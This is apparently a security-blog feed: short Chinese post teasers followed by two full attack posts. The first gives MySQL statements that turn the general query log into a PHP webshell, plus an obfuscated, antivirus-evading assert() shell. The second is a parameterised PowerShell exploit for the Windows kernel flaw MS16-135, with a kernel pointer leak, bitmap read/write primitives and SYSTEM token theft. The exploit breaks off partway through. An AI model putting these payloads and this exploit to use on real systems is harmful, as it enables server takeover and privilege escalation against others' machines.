all things
  • 11/05/16--20:57: ZMap之坑 (chan 69772724)
  • ZMap确实是个伟大的工具,但离伟大的社区、伟大的产品还有挺长的路要走。ZMap现在稳定版本是:zmap-2. […]


    说 OAuth2.0 漏洞/这个协议不安全的人,把头伸过来下,砖头准备好了。 Black Hat 的有关 Pa […]

  • 11/08/16--00:28: 记第10次印刷 (chan 69772724)
  • 《Web前端黑客技术揭秘》这本书2013.1月开售至今,已经第10次印刷,在安全类书籍中,这种成绩确实超出我们 […]


    Seebug Paper之前收录了三篇文章有些关联性,分别是: 绕过混合内容警告 – 在安全的页面 […]


    当代 Web 的 JSON 劫持技巧 http://paper.seebug.org/130/ 猥琐流的家伙居 […]

  • 12/01/16--19:47: [PRE]CSRF攻击-进击的巨人 (chan 69772724)
  • 计划准备出一个PPT专门讲解CSRF里的各种奇技淫巧,除了那些老套的手法之外: https://github. […]


    新年新气象,这个蠕虫我做了小范围测试,也提交了官方修复,小圈子里做了分享,这里正式对外公布下,出于研究而非破坏 […]

  • 03/05/17--00:37: 蠕虫挖矿一例,无码 (chan 69772724)
  • 今天凌晨,我们的蜜网系统跳出了个有趣的字符串: zaxa2aq@protonmail.com ProtonMa […]

  • 03/21/17--23:02: SQL语句利用日志写shell (chan 69772723)
  • outfile被禁止,或者写入文件被拦截;

    在数据库中操作如下:(必须是root权限)

    # Webshell via the MySQL general query log, for when FILE/outfile is blocked:
    # the general log records the statements the server receives, so pointing
    # general_log_file into the web root and sending a statement that contains
    # PHP plants the shell as a side effect of logging.
    # Preconditions (not checked by these statements): SET GLOBAL needs SUPER /
    # root, and the account mysqld runs as must be able to create the target
    # file under the web root. Every subsequent query is appended to the same
    # file and the shell is plainly visible to anyone reading the log, so note
    # the original values from the first query and restore them afterwards.
    show variables like '%general%';  # inspect current general_log / general_log_file (record them for restoring)
    
    set global general_log = on;  # enable the general query log
    
    set global general_log_file = '/var/www/html/1.php';   # redirect the log into the web root with a .php name
    
    select '<?php eval($_POST[cmd]);?>'  # this statement text is what lands in the log -> webshell body; eval($_POST[cmd]) runs whatever is POSTed as cmd
    
    

    SQL查询免杀shell的语句

    # "AV-evading" variant: the PHP never spells out its sink. Following the string ops:
    #   $a = array_keys($p)                       -> ['f','pffff','e','lfaaaa','nnnnn']
    #   $_ = $p['pffff'].$p['pffff'].$a[2]        -> 's'.'s'.'e' = 'sse'
    #   $_ = 'a'.$_.'rt'                          -> 'assert'
    #   $_(base64_decode($_REQUEST['username']))  -> assert(<base64-decoded 'username' parameter>)
    # i.e. assert()-based code execution on a base64 'username' request parameter.
    # NOTE(review): this depends on assert() evaluating a string argument, which PHP 8
    # no longer does, so it only works on PHP 7 and earlier.
    # Detection hint: PHP that assembles a callable from array_keys()/concatenation and
    # invokes it as $_(...), or a 'username' parameter carrying base64-encoded PHP.
    SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"
    

    原文:戳我


  • 04/09/17--22:28: MS16-135 带参数版 (chan 69772723)
  • 修改了一个带参数版的,方便用,代码如下:

    function Invoke-MS16-135 {
    <#
    .SYNOPSIS
        
        PowerShell implementation of MS16-135. The exploit targets all vulnerable
        operating systems that support PowerShell v2+. 
        
        * Win7-Win10 <== 64 bit!
    .PARAMETER Application
    Specifies an Application to run.
    .PARAMETER Commandline
    Specifies Commandline, such as net user xxx xxx /add
        
    .EXAMPLE
        C:\PS> Invoke-MS16-135 -Application C:\Windows\System32\cmd.exe
        C:\PS> Invoke-MS16-135 -Application C:\Windows\System32\cmd.exe -Commandline "/c net user 1 1 /add"
    #>
    [CmdletBinding()]
    param(
            [Parameter(Mandatory = $False, ParameterSetName = 'C:\Windows\System32\cmd.exe' )]
            [string]
            $Application,
    
            [Parameter(Mandatory = $False)]
            [string]
            $Commandline
    )
    Add-Type -TypeDefinition @"
    using System;
    using System.Diagnostics;
    using System.Runtime.InteropServices;
    using System.Security.Principal;
    
    [StructLayout(LayoutKind.Sequential)]
    public struct INPUT
    {
        public int itype;
        public KEYBDINPUT U;
        public int Size;
    }
    
    [StructLayout(LayoutKind.Sequential)]
    public struct KEYBDINPUT
    {
        public UInt16 wVk;
        public UInt16 wScan;
        public uint dwFlags;
        public int time;
        public IntPtr dwExtraInfo;
    }
    
    [StructLayout(LayoutKind.Sequential)] 
    public struct tagMSG  
    {  
        public IntPtr hwnd;
        public UInt32 message;
        public UIntPtr wParam;
        public UIntPtr lParam;
        public UInt32 time;
        public POINT pt;
    }
    
    public struct POINT
    {  
        public Int32 x;
        public Int32 Y;
    }
    
    // P/Invoke surface for the trigger: window-class registration, window creation
    // and re-parenting, a minimal message pump, SendInput keystroke injection, and
    // the GDI / VirtualAlloc calls the bitmap snapshot in Do-OrAddress relies on.
    // (This source is compiled at run time by Add-Type from an expandable
    // PowerShell here-string, so it must not contain dollar signs or backticks.)
    public class ms16135
    {
        // Window procedure signature for the custom class below.
        delegate IntPtr WndProc(
            IntPtr hWnd,
            uint msg,
            IntPtr wParam,
            IntPtr lParam);
    
        // Declared as WNDCLASSEX but handed to RegisterClassW, which takes a plain
        // WNDCLASS. NOTE(review): on x64 both layouts put lpfnWndProc at offset 8
        // (cbSize+style vs. style+padding), so the fields line up from there on;
        // that is presumably why cbSize stays unset in CustomClass and why this
        // only targets x64. Do not reuse this declaration as-is on x86.
        [System.Runtime.InteropServices.StructLayout(LayoutKind.Sequential,CharSet=CharSet.Unicode)]
        struct WNDCLASSEX
        {
            public uint cbSize;
            public uint style;
            public IntPtr lpfnWndProc;
            public int cbClsExtra;
            public int cbWndExtra;
            public IntPtr hInstance;
            public IntPtr hIcon;
            public IntPtr hCursor;
            public IntPtr hbrBackground;
            [MarshalAs(UnmanagedType.LPWStr)]
            public string lpszMenuName;
            [MarshalAs(UnmanagedType.LPWStr)]
            public string lpszClassName;
            public IntPtr hIconSm;
        }
        
        [System.Runtime.InteropServices.DllImport("user32.dll", SetLastError = true)]
        static extern System.UInt16 RegisterClassW(
            [System.Runtime.InteropServices.In] ref WNDCLASSEX lpWndClass);
    
        [System.Runtime.InteropServices.DllImport("user32.dll", SetLastError = true)]
        public static extern IntPtr CreateWindowExW(
            UInt32 dwExStyle,
            [MarshalAs(UnmanagedType.LPWStr)]
            string lpClassName,
            [MarshalAs(UnmanagedType.LPWStr)]
            string lpWindowName,
            UInt32 dwStyle,
            Int32 x,
            Int32 y,
            Int32 nWidth,
            Int32 nHeight,
            IntPtr hWndParent,
            IntPtr hMenu,
            IntPtr hInstance,
            IntPtr lpParam);
    
        [System.Runtime.InteropServices.DllImport("user32.dll", SetLastError = true)]
        static extern System.IntPtr DefWindowProcW(
            IntPtr hWnd,
            uint msg,
            IntPtr wParam,
            IntPtr lParam);
    
        [System.Runtime.InteropServices.DllImport("user32.dll", SetLastError = true)]
        public static extern bool DestroyWindow(
            IntPtr hWnd);
    
        [DllImport("user32.dll", SetLastError = true)]
        public static extern bool UnregisterClass(
            String lpClassName,
            IntPtr hInstance);
    
        [System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr GetModuleHandleW(
            [MarshalAs(UnmanagedType.LPWStr)]
            String lpModuleName);
    
        // SetWindowLongPtr only exists as an export in 64-bit user32 (on 32-bit it
        // is a macro over SetWindowLong) -- another reason this is x64-only.
        // Do-OrAddress calls it with nIndex -12 (GWLP_ID) to plant the target.
        [DllImport("user32.dll", EntryPoint="SetWindowLongPtr")]
        public static extern IntPtr SetWindowLongPtr(
            IntPtr hWnd,
            int nIndex,
            IntPtr dwNewLong);
    
        [DllImport("user32.dll")]
        public static extern bool ShowWindow(
            IntPtr hWnd,
            int nCmdShow);
    
        [DllImport("user32.dll", SetLastError = true)]
        public static extern IntPtr SetParent(
            IntPtr hWndChild,
            IntPtr hWndNewParent);
    
        [DllImport("user32.dll", SetLastError = false)]
        public static extern IntPtr GetDesktopWindow();
    
        [DllImport("user32.dll")]
        public static extern bool SetForegroundWindow(
            IntPtr hWnd);
    
        [DllImport("user32.dll", SetLastError=true)]
        public static extern void SwitchToThisWindow(
            IntPtr hWnd,
            bool fAltTab);
    
        // Message pump primitives used by Trigger-Write in Do-OrAddress.
        [DllImport("user32.dll")]
        public static extern bool GetMessage(
            out tagMSG lpMsg,
            IntPtr hWnd,
            uint wMsgFilterMin,
            uint wMsgFilterMax);
    
        [DllImport("user32.dll")]
        public static extern bool TranslateMessage(
            [In] ref tagMSG lpMsg);
    
        [DllImport("user32.dll")]
        public static extern IntPtr DispatchMessage(
            [In] ref tagMSG lpmsg);
    
        [DllImport("user32.dll", SetLastError = true)]
        public static extern IntPtr SetFocus(
            IntPtr hWnd);
    
        // Declared with a single INPUT by value rather than INPUT[]; that is fine
        // for nInputs == 1, which is all the Sim-KeyDown/Sim-KeyUp helpers send.
        // The trailing Size field in INPUT pads the struct to the native union
        // size (the union also has to hold MOUSEINPUT); cbSize must match it.
        [DllImport("user32.dll")]
        public static extern uint SendInput(
            uint nInputs, 
            [In] INPUT pInputs, 
            int cbSize);
    
        // GDI bitmap accessors: Do-OrAddress snapshots the worker bitmap with
        // GetBitmapBits to detect that the kernel OR landed.
        [DllImport("gdi32.dll")]
        public static extern int GetBitmapBits(
            IntPtr hbmp,
            int cbBuffer,
            IntPtr lpvBits);
    
        [DllImport("gdi32.dll")]
        public static extern int SetBitmapBits(
            IntPtr hbmp,
            int cbBytes,
            IntPtr lpBits);
    
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr VirtualAlloc(
            IntPtr lpAddress,
            uint dwSize,
            UInt32 flAllocationType,
            UInt32 flProtect);
    
        // Registers a window class named class_name whose procedure just forwards
        // to DefWindowProcW. Returns the class atom (0 on failure). Only
        // lpszClassName and lpfnWndProc are filled in; cbSize is left at 0
        // (see the note on WNDCLASSEX above).
        public UInt16 CustomClass(string class_name)
        {
            // Kept in a field (m_wnd_proc_delegate) so the delegate behind the
            // function pointer is not collected while the class is registered.
            m_wnd_proc_delegate = CustomWndProc;
            WNDCLASSEX wind_class = new WNDCLASSEX();
            wind_class.lpszClassName = class_name;
            ///wind_class.cbSize = (uint)Marshal.SizeOf(wind_class);
            wind_class.lpfnWndProc = System.Runtime.InteropServices.Marshal.GetFunctionPointerForDelegate(m_wnd_proc_delegate);
            return RegisterClassW(ref wind_class);
        }
    
        // Pass-through window procedure: default handling for every message.
        private static IntPtr CustomWndProc(IntPtr hWnd, uint msg, IntPtr wParam, IntPtr lParam)
        {
            return DefWindowProcW(hWnd, msg, wParam, lParam);
        }
    
        private WndProc m_wnd_proc_delegate;
    }
    "@
    
    #==============================================================[Banner]
        $ms16135 = @"
         _____ _____ ___   ___     ___   ___ ___ 
        |     |   __|_  | |  _|___|_  | |_  |  _|
        | | | |__   |_| |_| . |___|_| |_|_  |_  |
        |_|_|_|_____|_____|___|   |_____|___|___|
                                            
                           [by b33f -> @FuzzySec]
                           
    "@
    $ms16135
    
    #==============================================================[Pre-Run]
    # Exploit is only for x64
    if ([System.IntPtr]::Size -ne 8) {
        echo "`n[!] Target architecture is x64 only!`n"
        Return
    }
    
    # Get OS version
    $OSVersion = [Version](Get-WmiObject Win32_OperatingSystem).Version
    $Script:OSMajorMinor = "$($OSVersion.Major).$($OSVersion.Minor)"
    switch ($OSMajorMinor)
    {
        '10.0' # Win10 / 2k16
        {
            echo "[?] Target is Win 10"
            echo "[+] Bitmap dimensions: 0x760*0x4`n"
        }
    
        '6.3' # Win8.1 / 2k12R2
        {
            echo "[?] Target is Win 8.1"
            echo "[+] Bitmap dimensions: 0x760*0x4`n"
        }
    
        '6.2' # Win8 / 2k12
        {
            echo "[?] Target is Win 8"
            echo "[+] Bitmap dimensions: 0x760*0x4`n"
        }
    
        '6.1' # Win7 / 2k8R2
        {
            echo "[?] Target is Win 7"
            echo "[+] Bitmap dimensions: 0x770*0x4`n"
        }
    }
    
    #==============================================================[Helpers]
    function Get-LoadedModules {
    <#
    .SYNOPSIS
        Use NtQuerySystemInformation::SystemModuleInformation to get a list of
        loaded modules, their base address and size (x32/x64).
    
        Note: Low integrity only pre 8.1
    
    .DESCRIPTION
        Calls NtQuerySystemInformation with class 11 (SystemModuleInformation),
        growing the buffer until the call stops returning
        STATUS_INFO_LENGTH_MISMATCH, then walks the SYSTEM_MODULE_INFORMATION
        array and emits one PSObject per kernel module. The rest of this script
        takes element [0] as the kernel image to rebase exported symbols.

        Author: Ruben Boonen (@FuzzySec)
        License: BSD 3-Clause
        Required Dependencies: None
        Optional Dependencies: None
    
    .OUTPUTS
        PSObject[] with ImageName (string), ImageBase (Int32 on x86 / Int64 on
        x64) and ImageSize ("0x..." hex string). On any NTSTATUS other than
        success or length-mismatch the function returns with no output; callers
        that index [0] do not guard against that.

    .EXAMPLE
        C:\PS> $Modules = Get-LoadedModules
        C:\PS> $KernelBase = $Modules[0].ImageBase
        C:\PS> $KernelType = ($Modules[0].ImageName -split "\\")[-1]
        C:\PS> ......
    #>
    
        Add-Type -TypeDefinition @"
        using System;
        using System.Diagnostics;
        using System.Runtime.InteropServices;
        using System.Security.Principal;
    
        // Pack = 1 plus the ByValArray sizes fix this layout; the hard-coded entry
        // sizes used below (284 on x86, 296 on x64) were derived from it and
        // presumably assume 1-byte (ANSI) marshaling of the Char[] name field.
        [StructLayout(LayoutKind.Sequential, Pack = 1)]
        public struct SYSTEM_MODULE_INFORMATION
        {
            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 2)]
            public UIntPtr[] Reserved;
            public IntPtr ImageBase;
            public UInt32 ImageSize;
            public UInt32 Flags;
            public UInt16 LoadOrderIndex;
            public UInt16 InitOrderIndex;
            public UInt16 LoadCount;
            public UInt16 ModuleNameOffset;
            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 256)]
            internal Char[] _ImageName;
            // Module path as stored by the kernel, cut at the first NUL.
            public String ImageName {
                get {
                    return new String(_ImageName).Split(new Char[] {'\0'}, 2)[0];
                }
            }
        }
    
        public static class Ntdll
        {
            [DllImport("ntdll.dll")]
            public static extern int NtQuerySystemInformation(
                int SystemInformationClass,
                IntPtr SystemInformation,
                int SystemInformationLength,
                ref int ReturnLength);
        }
    "@
    
        # Grow-on-demand: start with a zero-length buffer and let the kernel report
        # the size it needs via ReturnLength.
        [int]$BuffPtr_Size = 0
        while ($true) {
            [IntPtr]$BuffPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($BuffPtr_Size)
            $SystemInformationLength = New-Object Int
        
            # SystemModuleInformation Class = 11
            $CallResult = [Ntdll]::NtQuerySystemInformation(11, $BuffPtr, $BuffPtr_Size, [ref]$SystemInformationLength)
            
            # STATUS_INFO_LENGTH_MISMATCH
            # (The P/Invoke returns a signed int, so the NTSTATUS comes back negative.
            # NOTE(review): the match relies on PowerShell parsing 0xC0000004 as a
            # signed Int32 literal -- confirm on the PowerShell version in use.)
            if ($CallResult -eq 0xC0000004) {
                [System.Runtime.InteropServices.Marshal]::FreeHGlobal($BuffPtr)
                [int]$BuffPtr_Size = [System.Math]::Max($BuffPtr_Size,$SystemInformationLength)
            }
            # STATUS_SUCCESS
            elseif ($CallResult -eq 0x00000000) {
                break
            }
            # Probably: 0xC0000005 -> STATUS_ACCESS_VIOLATION
            # Any other status: free the buffer and bail out with no output.
            else {
                [System.Runtime.InteropServices.Marshal]::FreeHGlobal($BuffPtr)
                return
            }
        }
    
        # Only the [type] is needed for PtrToStructure; the instance is discarded.
        $SYSTEM_MODULE_INFORMATION = New-Object SYSTEM_MODULE_INFORMATION
        $SYSTEM_MODULE_INFORMATION = $SYSTEM_MODULE_INFORMATION.GetType()
        # Entry stride is hard-coded rather than taken from Marshal.SizeOf(); keep
        # it in step with the struct definition above if that ever changes.
        if ([System.IntPtr]::Size -eq 4) {
            $SYSTEM_MODULE_INFORMATION_Size = 284
        } else {
            $SYSTEM_MODULE_INFORMATION_Size = 296
        }
    
        # Buffer layout as read here: a 32-bit module count, then the entry array
        # starting pointer-size bytes in (count plus alignment padding on x64).
        $BuffOffset = $BuffPtr.ToInt64()
        $HandleCount = [System.Runtime.InteropServices.Marshal]::ReadInt32($BuffOffset)
        $BuffOffset = $BuffOffset + [System.IntPtr]::Size
    
        $SystemModuleArray = @()
        for ($i=0; $i -lt $HandleCount; $i++){
            $SystemPointer = New-Object System.Intptr -ArgumentList $BuffOffset
            $Cast = [system.runtime.interopservices.marshal]::PtrToStructure($SystemPointer,[type]$SYSTEM_MODULE_INFORMATION)
            
            # Copy the fields out as managed values so nothing refers into the
            # native buffer once it is freed below.
            $HashTable = @{
                ImageName = $Cast.ImageName
                ImageBase = if ([System.IntPtr]::Size -eq 4) {$($Cast.ImageBase).ToInt32()} else {$($Cast.ImageBase).ToInt64()}
                ImageSize = "0x$('{0:X}' -f $Cast.ImageSize)"
            }
            
            $Object = New-Object PSObject -Property $HashTable
            $SystemModuleArray += $Object   # re-allocates the array per append; acceptable for module counts
        
            $BuffOffset = $BuffOffset + $SYSTEM_MODULE_INFORMATION_Size
        }
    
        # Emit the result first, then release the native buffer.
        $SystemModuleArray
    
        # Free SystemModuleInformation array
        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($BuffPtr)
    }
    
    function Stage-gSharedInfoBitmap {
    <#
    .SYNOPSIS
        Universal Bitmap leak using accelerator tables, 32/64 bit Win7-10 (post anniversary).
    
    .DESCRIPTION
        Leaks the kernel address of a freshly created bitmap without a kernel
        read primitive: accelerator tables are created one after another and each
        one's kernel object pointer is read from the user-mode mapping of
        gSharedInfo.aheList. When two consecutive tables report the same address
        (presumably the just-freed pool chunk being handed back), the last table
        is destroyed and a bitmap sized to fit that chunk is created in its
        place, so the leaked address now belongs to the bitmap.
        The bitmap size is keyed on $OSMajorMinor from the enclosing scope:
        width 0x770 on 6.1 (Win7), 0x760 on Win8-10; height 4, 1 plane, 8 bpp.

        Author: Ruben Boonen (@FuzzySec)
        License: BSD 3-Clause
        Required Dependencies: None
        Optional Dependencies: None
    
    .OUTPUTS
        One PSObject with BitmapHandle (HBITMAP), BitmapKernelObj (leaked kernel
        address) and BitmappvScan0 (KernelObj + 0x32 on x86 / + 0x50 on x64, the
        offset of pvScan0 inside the bitmap object as assumed by this script).
        NOTE(review): if no address repeat shows up within 20 attempts,
        $BitmapHandle is never assigned and $KernelArray[$i] with $i = 20 is past
        the end, so the returned fields are null; the caller does not check this.
        NOTE(review): none of the AllocHGlobal buffers below is ever freed.

    .EXAMPLE
        PS C:\Users\b33f> Stage-gSharedInfoBitmap |fl
        
        BitmapKernelObj : -7692235059200
        BitmappvScan0   : -7692235059120
        BitmapHandle    : 1845828432
        
        PS C:\Users\b33f> $Manager = Stage-gSharedInfoBitmap
        PS C:\Users\b33f> "{0:X}" -f $Manager.BitmapKernelObj
        FFFFF901030FF000
    #>
    
        Add-Type -TypeDefinition @"
        using System;
        using System.Diagnostics;
        using System.Runtime.InteropServices;
        using System.Security.Principal;
    
        public static class gSharedInfoBitmap
        {
            [DllImport("gdi32.dll")]
            public static extern IntPtr CreateBitmap(
                int nWidth,
                int nHeight,
                uint cPlanes,
                uint cBitsPerPel,
                IntPtr lpvBits);
    
            [DllImport("kernel32", SetLastError=true, CharSet = CharSet.Ansi)]
            public static extern IntPtr LoadLibrary(
                string lpFileName);
            
            [DllImport("kernel32", CharSet=CharSet.Ansi, ExactSpelling=true, SetLastError=true)]
            public static extern IntPtr GetProcAddress(
                IntPtr hModule,
                string procName);
    
            [DllImport("user32.dll")]
            public static extern IntPtr CreateAcceleratorTable(
                IntPtr lpaccl,
                int cEntries);
    
            [DllImport("user32.dll")]
            public static extern bool DestroyAcceleratorTable(
                IntPtr hAccel);
        }
    "@
    
        # Check Arch
        # ($x32 is only set here; the script has already exited unless it is x64,
        # so the 32-bit branches below are effectively dormant in this build.)
        if ([System.IntPtr]::Size -eq 4) {
            $x32 = 1
        }
    
        # Create one accelerator table and resolve its kernel object address via
        # the shared USER handle table. Emits a PSObject {Handle, KernelObj}.
        function Create-AcceleratorTable {
            [IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(10000)
            $AccelHandle = [gSharedInfoBitmap]::CreateAcceleratorTable($Buffer, 700) # +4 kb size
            # gSharedInfo is exported by user32; the pointer one slot after it is
            # aheList, the user-mode view of the handle table.
            $User32Hanle = [gSharedInfoBitmap]::LoadLibrary("user32.dll")
            $gSharedInfo = [gSharedInfoBitmap]::GetProcAddress($User32Hanle, "gSharedInfo")
            if ($x32){
                $gSharedInfo = $gSharedInfo.ToInt32()
            } else {
                $gSharedInfo = $gSharedInfo.ToInt64()
            }
            $aheList = $gSharedInfo + [System.IntPtr]::Size
            # The low 16 bits of the handle index aheList; the first field of each
            # _HANDLEENTRY (phead) is the kernel object pointer being leaked.
            if ($x32){
                $aheList = [System.Runtime.InteropServices.Marshal]::ReadInt32($aheList)
                $HandleEntry = $aheList + ([int]$AccelHandle -band 0xffff)*0xc # _HANDLEENTRY.Size = 0xC
                $phead = [System.Runtime.InteropServices.Marshal]::ReadInt32($HandleEntry)
            } else {
                $aheList = [System.Runtime.InteropServices.Marshal]::ReadInt64($aheList)
                $HandleEntry = $aheList + ([int]$AccelHandle -band 0xffff)*0x18 # _HANDLEENTRY.Size = 0x18
                $phead = [System.Runtime.InteropServices.Marshal]::ReadInt64($HandleEntry)
            }
    
            $Result = @()
            $HashTable = @{
                Handle = $AccelHandle
                KernelObj = $phead
            }
            $Object = New-Object PSObject -Property $HashTable
            $Result += $Object
            $Result
        }
    
        # The parameter name is misspelled ("Hanlde"), but every call site passes
        # -Hanlde, so it is kept as-is for compatibility.
        function Destroy-AcceleratorTable {
            param ($Hanlde)
            $CallResult = [gSharedInfoBitmap]::DestroyAcceleratorTable($Hanlde)
        }
    
        # Spray up to 20 tables. Each table is destroyed at the end of its
        # iteration, so the next one is created into a pool where that chunk was
        # just freed; a repeated address means the chunk came back and, after the
        # destroy below, is free for the bitmap to take.
        $KernelArray = @()
        for ($i=0;$i -lt 20;$i++) {
            $KernelArray += Create-AcceleratorTable
            if ($KernelArray.Length -gt 1) {
                if ($KernelArray[$i].KernelObj -eq $KernelArray[$i-1].KernelObj) {
                    Destroy-AcceleratorTable -Hanlde $KernelArray[$i].Handle
                    # NOTE(review): lpvBits is only 0x280 bytes while the bitmap's
                    # pixel data is width*4 (0x760*4 or 0x770*4) bytes, so
                    # CreateBitmap presumably reads past this buffer; a full-size
                    # buffer (or a zero pointer) would be safer.
                    [IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x50*2*4)
                    if ($OSMajorMinor -eq "6.1") { 
                        $BitmapHandle = [gSharedInfoBitmap]::CreateBitmap(0x770, 4, 1, 8, $Buffer) # Win7
                    } else {
                        $BitmapHandle = [gSharedInfoBitmap]::CreateBitmap(0x760, 4, 1, 8, $Buffer) # Win8-10
                    }
                    break
                }
            }
            Destroy-AcceleratorTable -Hanlde $KernelArray[$i].Handle
        }
    
        # $i still indexes the entry whose address the bitmap now occupies.
        $BitMapObject = @()
        $HashTable = @{
            BitmapHandle = $BitmapHandle
            BitmapKernelObj = $($KernelArray[$i].KernelObj)
            BitmappvScan0 = if ($x32) {$($KernelArray[$i].KernelObj) + 0x32} else {$($KernelArray[$i].KernelObj) + 0x50}
        }
        $Object = New-Object PSObject -Property $HashTable
        $BitMapObject += $Object
        $BitMapObject
    }
    
    function Bitmap-Elevate {
    <#
    .SYNOPSIS
        Arbitrary kernel read/write through two GDI bitmaps, used to copy the
        SYSTEM token pointer into the current process's _EPROCESS.
    .DESCRIPTION
        Precondition (established by the caller, outside this function): the
        manager bitmap's pvScan0 already points at the worker bitmap's pvScan0
        field. Bitmap-Read/Bitmap-Write then use SetBitmapBits on the manager to
        aim the worker at an arbitrary kernel address, and Get/SetBitmapBits on
        the worker to read/write there.
        The function resolves PsInitialSystemProcess from a user-mode load of the
        kernel image, rebases it onto the real kernel base, reads the SYSTEM
        _EPROCESS and its Token, walks ActiveProcessLinks to the entry whose
        UniqueProcessId equals $PID, and overwrites that entry's Token field.
    .PARAMETER ManagerBitmap
        HBITMAP of the manager bitmap (the one whose pvScan0 was redirected).
    .PARAMETER WorkerBitmap
        HBITMAP of the worker bitmap (the one actually read/written through).
    .NOTES
        NOTE(review): _EPROCESS offsets are keyed only on major.minor; the Win10
        set (0x2e8/0x358/0x2f0) matches particular builds only -- verify against
        the target build before use.
        NOTE(review): $x32Architecture is never assigned anywhere in this script,
        so the 32-bit branches are dead; consistent with the x64-only gate above.
        NOTE(review): the ActiveProcessLinks walk has no exit condition other
        than matching $PID; if it is never matched the loop cycles forever.
        NOTE(review): "duplicating" the token is a plain pointer copy -- the
        token's reference count is not touched, so stability after the process
        exits is not guaranteed. Confirm against the original write-up.
    #>
        param([IntPtr]$ManagerBitmap,[IntPtr]$WorkerBitmap)
    
        Add-Type -TypeDefinition @"
        using System;
        using System.Diagnostics;
        using System.Runtime.InteropServices;
        using System.Security.Principal;
        public static class BitmapElevate
        {
            [DllImport("gdi32.dll")]
            public static extern int SetBitmapBits(
                IntPtr hbmp,
                uint cBytes,
                byte[] lpBits);
            [DllImport("gdi32.dll")]
            public static extern int GetBitmapBits(
                IntPtr hbmp,
                int cbBuffer,
                IntPtr lpvBits);
            [DllImport("kernel32.dll", SetLastError = true)]
            public static extern IntPtr VirtualAlloc(
                IntPtr lpAddress,
                uint dwSize,
                UInt32 flAllocationType,
                UInt32 flProtect);
            [DllImport("kernel32.dll", SetLastError=true)]
            public static extern bool VirtualFree(
                IntPtr lpAddress,
                uint dwSize,
                uint dwFreeType);
            [DllImport("kernel32.dll", SetLastError=true)]
            public static extern bool FreeLibrary(
                IntPtr hModule);
            [DllImport("kernel32", SetLastError=true, CharSet = CharSet.Ansi)]
            public static extern IntPtr LoadLibrary(
                string lpFileName);
            [DllImport("kernel32", CharSet=CharSet.Ansi, ExactSpelling=true, SetLastError=true)]
            public static extern IntPtr GetProcAddress(
                IntPtr hModule,
                string procName);
        }
    "@
    
        # Arbitrary Kernel read
        # 1. SetBitmapBits(manager) writes $Address into the worker's pvScan0.
        # 2. GetBitmapBits(worker) copies pointer-size bytes from $Address into a
        #    scratch allocation, which is read back and released.
        # Assumes $Address is an Int64: BitConverter.GetBytes on an Int32 would
        # yield only 4 bytes while cBytes asks for 8.
        function Bitmap-Read {
            param ($Address)
            $CallResult = [BitmapElevate]::SetBitmapBits($ManagerBitmap, [System.IntPtr]::Size, [System.BitConverter]::GetBytes($Address))
            # 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE (RWX is
            # more than a read scratch buffer needs; PAGE_READWRITE would do).
            [IntPtr]$Pointer = [BitmapElevate]::VirtualAlloc([System.IntPtr]::Zero, [System.IntPtr]::Size, 0x3000, 0x40)
            $CallResult = [BitmapElevate]::GetBitmapBits($WorkerBitmap, [System.IntPtr]::Size, $Pointer)
            if ($x32Architecture){
                [System.Runtime.InteropServices.Marshal]::ReadInt32($Pointer)
            } else {
                [System.Runtime.InteropServices.Marshal]::ReadInt64($Pointer)
            }
            # 0x8000 = MEM_RELEASE. NOTE(review): MEM_RELEASE requires dwSize == 0;
            # with 8 the call should fail, so each read leaks a page and the
            # discarded return value hides it.
            $CallResult = [BitmapElevate]::VirtualFree($Pointer, [System.IntPtr]::Size, 0x8000)
        }
        
        # Arbitrary Kernel write
        # Same aiming step as Bitmap-Read, then SetBitmapBits(worker) stores the
        # pointer-size bytes of $Value at $Address.
        function Bitmap-Write {
            param ($Address, $Value)
            $CallResult = [BitmapElevate]::SetBitmapBits($ManagerBitmap, [System.IntPtr]::Size, [System.BitConverter]::GetBytes($Address))
            $CallResult = [BitmapElevate]::SetBitmapBits($WorkerBitmap, [System.IntPtr]::Size, [System.BitConverter]::GetBytes($Value))
        }
    
        # _EPROCESS field offsets per OS family (see the build caveat in .NOTES).
        # ActiveProcessLinks is always UniqueProcessId + pointer size, which the
        # list walk below relies on.
        switch ($OSMajorMinor)
        {
            '10.0' # Win10 / 2k16
            {
                $UniqueProcessIdOffset = 0x2e8
                $TokenOffset = 0x358
                $ActiveProcessLinks = 0x2f0
            }
        
            '6.3' # Win8.1 / 2k12R2
            {
                $UniqueProcessIdOffset = 0x2e0
                $TokenOffset = 0x348
                $ActiveProcessLinks = 0x2e8
            }
        
            '6.2' # Win8 / 2k12
            {
                $UniqueProcessIdOffset = 0x2e0
                $TokenOffset = 0x348
                $ActiveProcessLinks = 0x2e8
            }
        
            '6.1' # Win7 / 2k8R2
            {
                $UniqueProcessIdOffset = 0x180
                $TokenOffset = 0x208
                $ActiveProcessLinks = 0x188
            }
        }
        
        # Get EPROCESS entry for System process
        # The kernel image name comes from Get-LoadedModules[0]; loading that file
        # in user mode and taking GetProcAddress(PsInitialSystemProcess) gives the
        # export's offset from the image base, which is rebased onto the real
        # kernel base: (export - hModule) + KernelBase.
        echo "`n[>] Leaking SYSTEM _EPROCESS.."
        $SystemModuleArray = Get-LoadedModules
        $KernelBase = $SystemModuleArray[0].ImageBase
        $KernelType = ($SystemModuleArray[0].ImageName -split "\\")[-1]
        $KernelHanle = [BitmapElevate]::LoadLibrary("$KernelType")
        $PsInitialSystemProcess = [BitmapElevate]::GetProcAddress($KernelHanle, "PsInitialSystemProcess")
        $SysEprocessPtr = if (!$x32Architecture) {$PsInitialSystemProcess.ToInt64() - $KernelHanle + $KernelBase} else {$PsInitialSystemProcess.ToInt32() - $KernelHanle + $KernelBase}
        $CallResult = [BitmapElevate]::FreeLibrary($KernelHanle)
